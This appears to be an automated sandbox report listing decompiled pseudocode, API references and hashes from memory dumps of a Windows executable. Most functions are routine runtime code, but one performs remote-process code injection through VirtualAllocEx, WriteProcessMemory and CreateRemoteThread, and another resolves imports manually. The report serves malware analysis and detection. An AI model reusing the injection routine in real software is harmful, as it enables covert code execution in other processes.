API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess String ID: API String ID: 4115577372-0 Opcode ID: ac5fd2a75226c955654a40eea2f9c10799b08636886a80fed2fb8640707364b3 Instruction ID: e1a23b1bc05fdbb83d48aab71e7aa6dcb640bd1ecd97af4d12992e914dbb3fb7 Opcode Fuzzy Hash: ac5fd2a75226c955654a40eea2f9c10799b08636886a80fed2fb8640707364b3 Instruction Fuzzy Hash: 2BE04FA93023113AE920B2BB3C84DAB5DECEEC95B1B045426B60CDB221D964CC0941B5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 63%

E00423A1C(void* __eax, void* __ebx, void* __edx, void* __esi) { char _v8; char _v9; void* _v16; char* _t61; signed int _t64; char* _t67; signed int _t70; char* _t73; signed int _t76; signed char _t96; intOrPtr _t109; void* _t118; void* _t121; _v8 = 0; _t118 = __eax; _push(_t121); _push(0x423bb6); _push( *[fs:eax]); *[fs:eax] = _t121 + 0xfffffff4; E004047D4( &_v8, __edx); _t96 = E004238DC(_v8); if(_t96 == 0) { E00404CA0( &_v8, 1, 1); } _v16 = 0; _t61 = E00404C00(_v8); _t64 = RegOpenKeyExA(E00423A08(_t118, _t96), _t61, 0, 0x20019, &_v16); // executed _v9 = _t64 == 0; if(_v9 == 0) { _t67 = E00404C00(_v8); _t70 = RegOpenKeyExA(E00423A08(_t118, _t96), _t67, 0, 0x20009, &_v16); _v9 = _t70 == 0; if(_v9 == 0) { _t73 = E00404C00(_v8); _t76 = RegOpenKeyExA(E00423A08(_t118, _t96), _t73, 0, 1, &_v16); _v9 = _t76 == 0; if(_v9 != 0) { *(_t118 + 0x18) = 1; if(((_t76 & 0xffffff00 | *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) { _push( *((intOrPtr*)(_t118 + 0x10))); _push(E00423BD0); _push(_v8); E00404AC0(); } E004239E4(_t118, _v8, _v16); } } else { *(_t118 + 0x18) = 0x20009; if(((_t70 & 0xffffff00 | *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) { _push( *((intOrPtr*)(_t118 + 0x10))); _push(E00423BD0); _push(_v8); E00404AC0(); } E004239E4(_t118, _v8, _v16); } } else { *(_t118 + 0x18) = 0x20019; if(((_t64 & 0xffffff00 | *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) { _push( *((intOrPtr*)(_t118 + 0x10))); _push(E00423BD0); _push(_v8); E00404AC0(); } E004239E4(_t118, _v8, _v16); } _pop(_t109); *[fs:eax] = _t109; _push(E00423BBD); return E0040473C( &_v8); } 0x00423a26 0x00423a2b 0x00423a2f 0x00423a30 0x00423a35 0x00423a38 0x00423a40 0x00423a4d 0x00423a51 0x00423a60 0x00423a60 0x00423a67 0x00423a78 0x00423a88 0x00423a8f 0x00423a97 0x00423ae3 0x00423af3 0x00423afa 0x00423b02 0x00423b48 0x00423b58 0x00423b5f 0x00423b67 0x00423b69 0x00423b79 0x00423b7b 0x00423b7e 0x00423b83 0x00423b8e 0x00423b8e 0x00423b9b 0x00423b9b 0x00423b04 0x00423b04 0x00423b14 0x00423b16 0x00423b19 0x00423b1e 0x00423b29 0x00423b29 0x00423b36 0x00423b36 0x00423a99 0x00423a99 0x00423aa9 0x00423aab 0x00423aae 0x00423ab3 0x00423abe 0x00423abe 0x00423acb 0x00423acb 0x00423ba2 0x00423ba5 0x00423ba8 0x00423bb5

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88 RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423AF3 RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 00423B58

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Open String ID: API String ID: 71445658-0 Opcode ID: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87 Instruction ID: 1631747641735d97f0e726df34b4cb7d5d51ea82463f4736274f0810a2e96b2b Opcode Fuzzy Hash: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87 Instruction Fuzzy Hash: 4E41B170B00218BBDB11DFA5E952B9EB7F9AB44304F5144BBB445B3282CB7DAF059B48

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%

E0045EBB0(intOrPtr __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) { intOrPtr _v8; char _v12; CHAR* _t24; struct HINSTANCE__* _t25; CHAR* _t28; intOrPtr _t33; intOrPtr* _t36; void* _t39; _t36 = __ecx; _v12 = __edx; _v8 = __eax; E00404BF0(_v8); E00404BF0(_v12); _push(_t39); _push(0x45ec57); _push( *[fs:eax]); *[fs:eax] = _t39 + 0xfffffff8; 0; _t28 = E00404C00(_v8); LoadLibraryA(_t28); // executed *0x4666a8 = GetModuleHandleA(_t28); if( *0x4666a8 != 0) { 0; 0; _t24 = E00404C00(_v12); _t25 = *0x4666a8; // 0x738c0000 *_t36 = GetProcAddress(_t25, _t24); } _pop(_t33); *[fs:eax] = _t33; _push(0x45ec5e); return E00404760( &_v12, 2); } 0x0045ebb8 0x0045ebba 0x0045ebbd 0x0045ebc3 0x0045ebcb 0x0045ebd2 0x0045ebd3 0x0045ebd8 0x0045ebdb 0x0045ebe4 0x0045ebf6 0x0045ebf9 0x0045ec06 0x0045ec12 0x0045ec1a 0x0045ec1e 0x0045ec29 0x0045ec2f 0x0045ec3a 0x0045ec3a 0x0045ec3e 0x0045ec41 0x0045ec44 0x0045ec56

APIs

LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9 GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01 GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleLibraryLoadModuleProc String ID: API String ID: 310444273-0 Opcode ID: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8 Instruction ID: d4a4c4ef2a58cf9094cbc387d8303d04bade7ed1a93cf8cbbf6f48fd4d8bd229 Opcode Fuzzy Hash: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8 Instruction Fuzzy Hash: 790140B0605244AFEB05EB76ED42A5A7BF8DB49314F12047AF504E32E2E678EE50C618

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0040CF98() { signed short _t13; int _t17; signed int _t21; signed int _t22; void* _t34; void* _t35; *0x4658c8 = 0x409; *0x004658CC = 9; *0x004658D0 = 1; _t13 = GetThreadLocale(); if(_t13 != 0) { *0x4658c8 = _t13; } if(_t13 != 0) { *0x004658CC = _t13 & 0x3ff; *0x004658D0 = (_t13 & 0x0000ffff) >> 0xa; } memcpy(0x461808, 0x40d03c, 8 << 2); _t34 = 0x4658c8; if( *0x4617c4 <= 4 || *0x4617c0 != 2) { *((char*)(_t34 + 0xd)) = GetSystemMetrics(0x4a) & 0xffffff00 | _t15 != 0x00000000; } else { *0x0040D049 = 1; } _t17 = GetSystemMetrics(0x2a); // executed _t22 = _t21 & 0xffffff00 | _t17 != 0x00000000; *(_t34 + 0xc) = _t22; if(_t22 != 0) { return E0040CF3C(_t35); } return _t17; } 0x0040cfa6 0x0040cfac 0x0040cfb3 0x0040cfba 0x0040cfc1 0x0040cfc3 0x0040cfc3 0x0040cfc8 0x0040cfd4 0x0040cfdd 0x0040cfdd 0x0040cff0 0x0040cff2 0x0040cffa 0x0040d017 0x0040d005 0x0040d005 0x0040d005 0x0040d01c 0x0040d023 0x0040d026 0x0040d02b 0x00000000 0x0040d033 0x0040d03a

APIs

GetThreadLocale.KERNEL32 ref: 0040CFBA GetSystemMetrics.USER32 ref: 0040D00D GetSystemMetrics.USER32 ref: 0040D01C

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$LocaleThread String ID: API String ID: 2159509485-0 Opcode ID: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e Instruction ID: 76d1b7ec664e111f503e51dd0c1979d9023841a60a1f3c9667e84ab395d3be29 Opcode Fuzzy Hash: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e Instruction Fuzzy Hash: F3018860A407518AD3205B6694013637AC8DB02319F08C03FE88DE73C2EB3DD846836A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E035A45EC(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) { void* _v8; long _v12; long _v16; void* _t16; void* _t23; void* _t32; void* _t33; _v8 = __ecx; _t23 = __eax; _t33 = E035A45BC(__eax, _a8, _v8); _t16 = CreateRemoteThread(_t23, 0, 0, E035A45BC(_t23, E035A4500(__edx), __edx), _t33, 0, &_v16); // executed _t32 = _t16; if(_a4 != 0) { WaitForSingleObject(_t32, 0xffffffff); ReadProcessMemory(_t23, _t33, _v8, _a8, &_v12); } return _t32; } 0x035a45f5 0x035a45fa 0x035a4609 0x035a462a 0x035a462f 0x035a4635 0x035a463a 0x035a464d 0x035a464d 0x035a465a

APIs

Part of subcall function 035A45BC: VirtualAllocEx.KERNEL32(0A74C085,00000000,00000018,00003000,00000040,00000018,?,00000000,00000018,0A74C085,035A49C7,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll), ref: 035A45D2 Part of subcall function 035A45BC: WriteProcessMemory.KERNEL32(0A74C085,00000000,00000018,00000018,?,0A74C085,00000000,00000018,00003000,00000040,00000018,?,00000000,00000018,0A74C085,035A49C7), ref: 035A45DE CreateRemoteThread.KERNEL32(0A74C085,00000000,00000000,00000000,00000000,00000000,?), ref: 035A462A WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000018,0A74C085), ref: 035A463A ReadProcessMemory.KERNEL32(0A74C085,00000000,550A74C0,?,00000000,00000000,000000FF,00000000,00000018,0A74C085), ref: 035A464D

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite String ID: API String ID: 3966641755-0 Opcode ID: 8ee8674f0dfdffdcf826dffac77f5da7d944114e7cf52932ab7de1a8faf29488 Instruction ID: 23b0dfa982663fdbc42de64737a77099f9d0c59b112728f104105bf4ede8877e Opcode Fuzzy Hash: 8ee8674f0dfdffdcf826dffac77f5da7d944114e7cf52932ab7de1a8faf29488 Instruction Fuzzy Hash: E301A7757002087BD710E6EDAC80FAFB7EDABC9270F144169B518DB390D9749D0457A4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%

E035A552C(intOrPtr __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) { intOrPtr _v8; char _v12; CHAR* _t22; struct HINSTANCE__* _t23; CHAR* _t26; intOrPtr _t31; intOrPtr* _t34; void* _t37; _t34 = __ecx; _v12 = __edx; _v8 = __eax; E035947CC(_v8); E035947CC(_v12); _push(_t37); _push(0x35a55b1); _push( *[fs:eax]); *[fs:eax] = _t37 + 0xfffffff8; _t26 = E035947DC(_v8); LoadLibraryA(_t26); // executed *0x35ad390 = GetModuleHandleA(_t26); if( *0x35ad390 != 0) { _t22 = E035947DC(_v12); _t23 = *0x35ad390; // 0x0 *_t34 = GetProcAddress(_t23, _t22); } _pop(_t31); *[fs:eax] = _t31; _push(0x35a55b8); return E03594360( &_v12, 2); } 0x035a5534 0x035a5536 0x035a5539 0x035a553f 0x035a5547 0x035a554e 0x035a554f 0x035a5554 0x035a5557 0x035a5562 0x035a5565 0x035a5572 0x035a557e 0x035a5583 0x035a5589 0x035a5594 0x035a5594 0x035a5598 0x035a559b 0x035a559e 0x035a55b0

APIs

LoadLibraryA.KERNEL32(00000000,00000000,035A55B1,?,?,00000000), ref: 035A5565 GetModuleHandleA.KERNEL32(00000000,00000000,00000000,035A55B1,?,?,00000000), ref: 035A556D GetProcAddress.KERNEL32(00000000,00000000), ref: 035A558F

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressHandleLibraryLoadModuleProc String ID: API String ID: 310444273-0 Opcode ID: 6f8d2fa40c66829d911f34fa713746eaede771555874173946ffaa485200e174 Instruction ID: 847973b41d0c2d687e57806c6e9f0c5b6232b014acfc342fe562d325ce77106f Opcode Fuzzy Hash: 6f8d2fa40c66829d911f34fa713746eaede771555874173946ffaa485200e174 Instruction Fuzzy Hash: 58012CB4600709AFEB00FBA9EC6195EB7F8FB8E610F510966A404D7660E7349D06AB10

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00423CC2(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) { int _v8; char _v12; char _v16; void* __ebx; void* __edi; void* __esi; void* __ebp; long _t18; void* _t26; intOrPtr _t30; char _t38; _t35 = __ecx; _t38 = __edx; _t26 = __eax; _v8 = 0; _t18 = RegQueryValueExA( *(_t26 + 4), E00404C00(__edx), 0, &_v8, __ecx, &_a8); // executed if(_t18 != 0) { _v16 = _t38; _v12 = 0xb; _t30 = *0x462f48; // 0x4161b8 E0040C214(_t26, _t30, 1, _t35, _t38, 0, &_v16); E00404184(); } *_a4 = E004238F0(_v8); return _a8; } 0x00423ccd 0x00423ccf 0x00423cd1 0x00423cd5 0x00423cef 0x00423cf6 0x00423cf8 0x00423cfb 0x00423d05 0x00423d12 0x00423d17 0x00423d17 0x00423d2a 0x00423d34

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00423CEF

Strings

48B , xrefs: 00423D0D

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue String ID: 48B API String ID: 3660427363-1399719961 Opcode ID: 0794083d3378ee110cbc96ea9d2242b7670d2b8dc1216ac4c1635f1df70efc8f Instruction ID: dc9a7b025fb012292c3c1f78a1d553d82cca77016de03337154782b34ab35c11 Opcode Fuzzy Hash: 0794083d3378ee110cbc96ea9d2242b7670d2b8dc1216ac4c1635f1df70efc8f Instruction Fuzzy Hash: 55012175B00208BFD700EF99DC81A9AB7FCDB59314F10817AFD14DB281DA759E0487A5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00423CC4(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) { int _v8; char _v12; char _v16; void* __ebx; void* __edi; void* __esi; void* __ebp; long _t18; void* _t25; intOrPtr _t28; char _t33; _t32 = __ecx; _t33 = __edx; _t25 = __eax; _v8 = 0; _t18 = RegQueryValueExA( *(_t25 + 4), E00404C00(__edx), 0, &_v8, __ecx, &_a8); // executed if(_t18 != 0) { _v16 = _t33; _v12 = 0xb; _t28 = *0x462f48; // 0x4161b8 E0040C214(_t25, _t28, 1, _t32, _t33, 0, &_v16); E00404184(); } *_a4 = E004238F0(_v8); return _a8; } 0x00423ccd 0x00423ccf 0x00423cd1 0x00423cd5 0x00423cef 0x00423cf6 0x00423cf8 0x00423cfb 0x00423d05 0x00423d12 0x00423d17 0x00423d17 0x00423d2a 0x00423d34

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00423CEF

Strings

48B , xrefs: 00423D0D

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue String ID: 48B API String ID: 3660427363-1399719961 Opcode ID: 5053dc36f7366c11ef80729d79039a07f790926b80e060c94d0a9636341c036b Instruction ID: a8e3a137c339f5fd24472462273deb51e711ff11fc4394b496541acd54afbdef Opcode Fuzzy Hash: 5053dc36f7366c11ef80729d79039a07f790926b80e060c94d0a9636341c036b Instruction Fuzzy Hash: 45012175B00208BBD700EF99DC81A9AB7BCDB59314F10817AFD14DB281DA759E0487A5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%

E00423BD0(intOrPtr* __eax, signed int __ebx, char* __ecx, void* __edx, void* __fp0) { long _t16; intOrPtr* _t32; char* _t35; intOrPtr* _t37; _pop(_t37); *__eax = *__eax + __eax; *((intOrPtr*)(__ebx + 0x56)) = *((intOrPtr*)(__ebx + 0x56)) + __edx; _push(__ebx); _push(__ecx); _t35 = __ecx; _t32 = __eax; E00403264(__ecx, 8); _t16 = RegQueryValueExA( *(_t32 + 4), E00404C00(__edx), 0, _t37 + 8, 0, _t35 + 4); // executed *_t35 = E004238F0( *_t37); return __ebx & 0xffffff00 | _t16 == 0x00000000; } 0x00423bd0 0x00423bd1 0x00423bd3 0x00423bd4 0x00423bd8 0x00423bd9 0x00423bdd 0x00423be8 0x00423c06 0x00423c18 0x00423c22

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,00423C38), ref: 00423C06

Strings

MS Shell Dlg 2 , xrefs: 00423BD7

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue String ID: MS Shell Dlg 2 API String ID: 3660427363-3198668166 Opcode ID: 24aede73455477a306b869990c3da6da698364b98985e0eaff83912404be2809 Instruction ID: 7c8ec6a0d6e2363a4a3569427e10175affe607f8ccc4c0b7cc53773ec14cf429 Opcode Fuzzy Hash: 24aede73455477a306b869990c3da6da698364b98985e0eaff83912404be2809 Instruction Fuzzy Hash: FCF0826230D2446FD704EA6EAC41BAB7BDCDBC5310F05807FF948C7582DA24DD088369

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%

E00423BD4(void* __eax, char* __ecx, void* __edx, void* __fp0) { long _t14; signed int _t18; void* _t26; char* _t27; intOrPtr* _t28; _push(__ecx); _t27 = __ecx; _t26 = __eax; E00403264(__ecx, 8); _t14 = RegQueryValueExA( *(_t26 + 4), E00404C00(__edx), 0, _t28 + 8, 0, _t27 + 4); // executed *_t27 = E004238F0( *_t28); return _t18 & 0xffffff00 | _t14 == 0x00000000; } 0x00423bd8 0x00423bd9 0x00423bdd 0x00423be8 0x00423c06 0x00423c18 0x00423c22

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,00423C38), ref: 00423C06

Strings

MS Shell Dlg 2 , xrefs: 00423BD5, 00423BD7

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue String ID: MS Shell Dlg 2 API String ID: 3660427363-3198668166 Opcode ID: ae18820a77b22da24d61138b18a13f76920247e522b4d3da3e4fdaa58bf8c099 Instruction ID: 41461fa9fb353abdc0202eda5798ac71598ea82e96ed0a8436159ebd475baf22 Opcode Fuzzy Hash: ae18820a77b22da24d61138b18a13f76920247e522b4d3da3e4fdaa58bf8c099 Instruction Fuzzy Hash: 92F030723092046BE704EA6EAD41FABA7DCDBC9355F11803EF948D7281DA24DD088365

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E004605D0(void* __ecx, void* __edi, void* __esi) { intOrPtr _t6; intOrPtr _t8; intOrPtr _t10; intOrPtr _t12; intOrPtr _t14; void* _t16; void* _t17; intOrPtr _t20; intOrPtr _t21; intOrPtr _t22; intOrPtr _t23; intOrPtr _t28; _t25 = __esi; _t17 = __ecx; _push(_t28); _push(0x460656); _push( *[fs:eax]); *[fs:eax] = _t28; *0x4664fc = *0x4664fc - 1; if( *0x4664fc < 0) { *0x4664f8 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed _t31 = *0x4664f8; E004478D4(_t16, __edi, *0x4664f8); _t6 = *0x4362e8; // 0x436334 E0041A040(_t6, _t16, _t17, *0x4664f8); _t8 = *0x4362e8; // 0x436334 E0041A0E0(_t8, _t16, _t17, _t31); _t21 = *0x4362e8; // 0x436334 _t10 = *0x447f50; // 0x447f9c E0041A08C(_t10, _t16, _t21, __esi, _t31); _t22 = *0x4362e8; // 0x436334 _t12 = *0x44958c; // 0x4495d8 E0041A08C(_t12, _t16, _t22, __esi, _t31); _t23 = *0x4362e8; // 0x436334 _t14 = *0x4496b0; // 0x4496fc E0041A08C(_t14, _t16, _t23, _t25, _t31); } _pop(_t20); *[fs:eax] = _t20; _push(0x46065d); return 0; } 0x004605d0 0x004605d0 0x004605d5 0x004605d6 0x004605db 0x004605de 0x004605e1 0x004605e8 0x004605f8 0x004605f8 0x004605ff 0x00460604 0x00460609 0x0046060e 0x00460613 0x00460618 0x0046061e 0x00460623 0x00460628 0x0046062e 0x00460633 0x00460638 0x0046063e 0x00460643 0x00460643 0x0046064a 0x0046064d 0x00460650 0x00460655

APIs

GetVersion.KERNEL32(00000000,00460656), ref: 004605EA Part of subcall function 004478D4: GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5 Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447928 Part of subcall function 004478D4: GetCurrentThreadId.KERNEL32 ref: 00447943 Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447979 Part of subcall function 004478D4: RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F Part of subcall function 004478D4: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13 Part of subcall function 004478D4: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24

Strings

4cC , xrefs: 00460604, 0046060E, 00460618, 00460628, 00460638

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow String ID: 4cC API String ID: 3557136124-2099690512 Opcode ID: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803 Instruction ID: 025689f7684f9bed17e1c02e81f1f2566ccf6c41d45d360a3a3928fa787afd4c Opcode Fuzzy Hash: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803 Instruction Fuzzy Hash: C5F0FF39244241AFD311FF26EC5291B3BA4E789314353857BE84043675DA3DECA1DB9E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E0045ED90(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) { intOrPtr _v8; intOrPtr _v12; char _v16; intOrPtr _t16; intOrPtr _t17; intOrPtr _t20; CHAR* _t26; struct HINSTANCE__* _t27; intOrPtr _t28; struct HINSTANCE__* _t35; intOrPtr _t38; CHAR* _t50; void* _t51; intOrPtr _t53; void* _t60; _push(__ebx); _v16 = 0; _v8 = __eax; _push(_t60); _push(0x45eed7); _push( *[fs:eax]); *[fs:eax] = _t60 + 0xfffffff4; 0; *0x46666c = _v8; while(1) { _t16 = *0x46666c; // 0x2e980f0 if( *((intOrPtr*)(_t16 + 0xc)) == 0) { break; } 0; 0; _t17 = *0x46666c; // 0x2e980f0 _t4 = _t17 + 0xc; // 0x0 *0x46667c = *_t4 + *0x466630; _push(0x466680); _t20 = *0x46665c; // 0x0 _v12 = _t20; _push(E004058B4()); _t50 = *0x46667c; // 0x2e98ccc E00404934( &_v16, _t50); _pop(_t51); if(E0045ECA0(0x466670, _t51) == 0) { 0; _t26 = *0x46667c; // 0x2e98ccc _t27 = LoadLibraryA(_t26); // executed *0x466668 = _t27; } _t28 = *0x46666c; // 0x2e980f0 if( *((intOrPtr*)(_t28 + 4)) != 0) { 0; 0; } else { 0; 0; 0; _t38 = *0x46666c; // 0x2e980f0 _t10 = _t38 + 0x10; // 0x0 *0x466670 = *_t10 + *0x466630; } while( *((intOrPtr*)( *0x466670)) != 0) { *0x466674 = *((intOrPtr*)( *0x466670)) + *0x466630 + 2; _t35 = *0x466668; // 0x6f9f0000 *0x466678 = GetProcAddress(_t35, *0x466674); *((intOrPtr*)( *0x466670)) = *0x466678; *0x466670 = *0x466670 + 4; } *0x46666c = *0x46666c + 0x14; } _pop(_t53); *[fs:eax] = _t53; _push(0x45eede); return E0040473C( &_v16); } 0x0045ed96 0x0045ed9b 0x0045ed9e 0x0045edb2 0x0045edb3 0x0045edb8 0x0045edbb 0x0045edc4 0x0045edc8 0x0045eeb2 0x0045eeb2 0x0045eebb 0x00000000 0x00000000 0x0045edd8 0x0045eddc 0x0045edde 0x0045ede3 0x0045edec 0x0045edf1 0x0045edf6 0x0045edfb 0x0045ee03 0x0045ee07 0x0045ee0d 0x0045ee18 0x0045ee20 0x0045ee28 0x0045ee2b 0x0045ee31 0x0045ee36 0x0045ee36 0x0045ee3e 0x0045ee47 0x0045ee71 0x0045ee75 0x0045ee4f 0x0045ee4f 0x0045ee53 0x0045ee57 0x0045ee59 0x0045ee5e 0x0045ee67 0x0045ee67 0x0045eea4 0x0045ee89 0x0045ee8e 0x0045ee99 0x0045ee9f 0x0045eea1 0x0045eea1 0x0045eeab 0x0045eeab 0x0045eec3 0x0045eec6 0x0045eec9 0x0045eed6

APIs

LoadLibraryA.KERNEL32(02E98CCC,00466680,00000000,0045EED7), ref: 0045EE31

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad String ID: API String ID: 1029625771-0 Opcode ID: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826 Instruction ID: 41749767bb47e492ca36cbe40e98458e297fbfc91c6430a84583a06b372d5935 Opcode Fuzzy Hash: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826 Instruction Fuzzy Hash: D8313AB0A01600EFCB04CF29F882E5677F4EB4A310B12857AE805D7361E379AD05CF5A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%

